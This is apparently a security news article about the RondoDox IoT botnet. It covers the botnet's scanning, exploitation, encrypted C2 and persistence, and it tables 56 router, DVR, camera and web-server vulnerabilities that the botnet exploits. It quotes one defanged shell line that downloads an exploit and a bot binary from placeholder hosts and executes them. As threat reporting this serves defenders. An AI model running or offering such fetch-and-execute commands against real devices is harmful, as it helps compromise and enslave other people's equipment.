RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers

Since its emergence in early 2025, RondoDox has rapidly become one of the most pervasive IoT-focused botnets in operation, targeting a wide range of network-connected devices—from consumer routers to enterprise CCTV systems and web servers.

Its modular design allows operators to deploy tailored exploit modules against over 50 distinct vulnerabilities, enabling swift compromise of disparate platforms.

In many attack campaigns, adversaries have leveraged automated scanning to identify exposed devices, followed by rapid exploitation and command-and-control enrollment.

Trend Micro researchers identified RondoDox in April 2025 after observing anomalous traffic patterns emanating from compromised DVR appliances in multiple regions.

Subsequent analysis revealed a core engine written in Go, facilitating cross-platform deployment and efficient binary size.

The botnet’s command protocols support encrypted communications, ensuring stealthy C2 exchanges even under network monitoring.

Upon successful exploitation, RondoDox deploys a lightweight persistence agent designed to survive device reboots and firmware updates.

This agent periodically polls C2 servers for new payloads or commands, while self-healing routines reinstall components if removed.

Infections frequently culminate in the device participating in large-scale DDoS attacks or clandestine proxying for subsequent threat operations.

Infection Mechanism

RondoDox’s infection chain typically begins with a reconnaissance phase in which the malware’s scanning module probes devices for open Telnet (port 23), SSH (port 22), and HTTP management interfaces.

Once a target is identified, the appropriate exploit payload—drawn from its extensive repository— is delivered.

For instance, in one module, the scanner uses the CVE-2021-20090 router authentication bypass to execute a shell payload:-

wget http[:]//malicious.example/exploit; chmod +x exploit
./ exploit - u admin - p '' - c ' wget http[:]//cdn[.]example/rondox && chmod +x rondox && ./ rondox'

After initial code execution, the payload establishes an encrypted TLS channel back to C2 on port 443, disguising its traffic as legitimate HTTPS.

Trend Micro analysts noted that this encryption scheme relies on a custom certificate bundle, complicating interception and inspection efforts.

Once communication is established, the bot requests and loads additional modules—such as network scanners or DDoS tools—directly into memory.

The multi-stage infection flow highlights the transition from reconnaissance to exploitation and persistence.

A timeline of the RondoDox vulnerability (Source – Trend Micro)

Following the infection mechanism, RondoDox leverages device-specific persistence techniques, such as crontab entries on Linux-based DVRs or firmware image modification on certain router models, ensuring continued operation.

Its adaptability and broad exploit library underscore the urgent need for patch management and network segmentation to mitigate this evolving threat.

The table below provides a detailed overview of all 50+ vulnerabilities currently exploited by RondoDox, including their CVE identifiers, affected products, impact ratings, required exploit prerequisites, and CVSS 3.1 scores.

#Vendor / ProductCVE IDCWE / TypeStatusNotes
1Nexxt Router FirmwareCVE-2022-44149CWE-78 (Command Injection)N-Day
2D-Link RoutersCVE-2015-2051CWE-78N-Day
3Netgear R7000 / R6400CVE-2016-6277CWE-78N-Day
4Netgear (mini_httpd)CVE-2020-27867CWE-78N-Day
5Apache HTTP ServerCVE-2021-41773CWE-22 (Path Traversal / RCE)N-Day
6Apache HTTP ServerCVE-2021-42013CWE-22N-Day
7TBK DVRsCVE-2024-3721CWE-78Targeted
8TOTOLINK (setMtknatCfg)CVE-2025-1829CWE-78N-Day
9Meteobridge Web InterfaceCVE-2025-4008CWE-78N-Day
10D-Link DNS-320CVE-2020-25506CWE-78N-Day
11Digiever DS-2105 ProCVE-2023-52163CWE-78N-Day
12Netgear DGN1000CVE-2024-12847CWE-78N-Day
13D-Link (multiple)CVE-2024-10914CWE-78N-Day
14Edimax RE11S RouterCVE-2025-22905CWE-78N-Day
15QNAP VioStor NVRCVE-2023-47565CWE-78N-Day
16D-Link DIR-816CVE-2022-37129CWE-78N-Day
17GNU Bash (ShellShock)CVE-2014-6271CWE-78 (Code Injection)N-Day / Historical
18Dasan GPON Home RouterCVE-2018-10561CWE-287 (Auth Bypass)N-Day
19Four-Faith Industrial RoutersCVE-2024-12856CWE-78N-Day
20TP-Link Archer AX21CVE-2023-1389CWE-78Targeted
21D-Link RoutersCVE-2019-16920CWE-78N-Day
22Tenda (fromNetToolGet)CVE-2025-7414CWE-78N-Day
23Tenda (deviceName)CVE-2020-10987CWE-78N-Day
24LB-LINK RoutersCVE-2023-26801CWE-78N-Day
25Linksys E-SeriesCVE-2025-34037CWE-78N-Day
26AVTECH CCTVCVE-2024-7029CWE-78N-Day
27TOTOLINK X2000RCVE-2025-5504CWE-78N-Day
28ZyXEL P660HN-T1ACVE-2017-18368CWE-78N-Day
29Hytec HWL-2511-SSCVE-2022-36553CWE-78N-Day
30Belkin Play N750CVE-2014-1635CWE-120 (Buffer Overflow)N-Day
31TRENDnet TEW-411BRPplusCVE-2023-51833CWE-78N-Day
32TP-Link TL-WR840NCVE-2018-11714CWE-78N-Day
33D-Link DIR820LA1CVE-2023-25280CWE-78N-Day
34Billion 5200W-TCVE-2017-18369CWE-78N-Day
35Cisco (multiple products)CVE-2019-1663CWE-119 (Memory Corruption)N-Day
36TOTOLINK (setWizardCfg)CVE-2024-1781CWE-78N-Day
37Hikvision NVRCommand InjectionNo CVEListed by Trend Micro w/o CVE
38Dahua DVRRemote Code ExecutionNo CVEListed by Trend Micro w/o CVE
39Wavlink RoutersCWE-78No CVEListed by Trend Micro w/o CVE
40ZTE ZXHN RouterCWE-78No CVEListed by Trend Micro w/o CVE
41Seenergy NVRAuthentication BypassNo CVEListed by Trend Micro w/o CVE
42Uniview NVRCWE-78No CVEListed by Trend Micro w/o CVE
43TP-Link TD-W8960NCWE-78No CVEListed by Trend Micro w/o CVE
44Dahua IP CameraCWE-78No CVEListed by Trend Micro w/o CVE
45HiSilicon FirmwareBuffer OverflowNo CVEListed by Trend Micro w/o CVE
46Amcrest CameraCWE-78No CVEListed by Trend Micro w/o CVE
47Hikvision IP CameraCWE-78No CVEListed by Trend Micro w/o CVE
48LILIN CameraCWE-78No CVEListed by Trend Micro w/o CVE
49TP-Link WR941NCWE-78No CVEListed by Trend Micro w/o CVE
50Wavlink WL-WN575A3CWE-78No CVEListed by Trend Micro w/o CVE
51Dahua NVRCWE-78No CVEListed by Trend Micro w/o CVE
52Tenda AC6CWE-78No CVEListed by Trend Micro w/o CVE
53Hikvision DS-7108HGHICWE-78No CVEListed by Trend Micro w/o CVE
54LB-LINK BL-WR450HCWE-78No CVEListed by Trend Micro w/o CVE
55ZTE ZXHN H108NCWE-78No CVEListed by Trend Micro w/o CVE
56Wavlink WL-WN531G3CWE-78No CVEListed by Trend Micro w/o CVE

Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

The post RondoDox Botnet Exploits 50+ Vulnerabilities to Attack Routers, CCTV Systems and Web Servers appeared first on Cyber Security News.